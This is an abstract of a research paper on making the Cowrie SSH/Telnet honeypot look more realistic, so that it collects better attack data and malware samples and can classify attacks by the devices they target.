Enhancing SSH/Telnet Honeypot for Attack Classification and Malware Research

Nowadays, honeypots are widely used for detecting and analyzing attack activity and behaviors, including login attempts, command executions, or code injection. The ability to collect malware from attackers depends on how effectively the honeypot replicates real devices and whether the attack is targeted at a specific device model or class or is generic. This work improves the Cowrie SSH/Telnet honeypot's effectiveness to enhance data quality and support advanced attack analysis. We implemented a logging system for real-time log collection, normalization, and visualization. Despite high attack volume, many sessions ended early due to bots detecting the honeypot. To mitigate detection, we developed a modified honeypot replica featuring system file changes and access controls using realistic username and password lists. Multiple configurations were tested to assess their effect on attacker behavior. Our results highlight the challenges of evasion by automated attackers but demonstrate that improved honeypot realism leads to more meaningful data for cybersecurity research, enabling the filtering and classification of attacks targeting specific devices or providing a starting dataset for further refinement using machine learning techniques. Future work will focus on further enhancing honeypot stealth and customization and expanding malware analysis capabilities.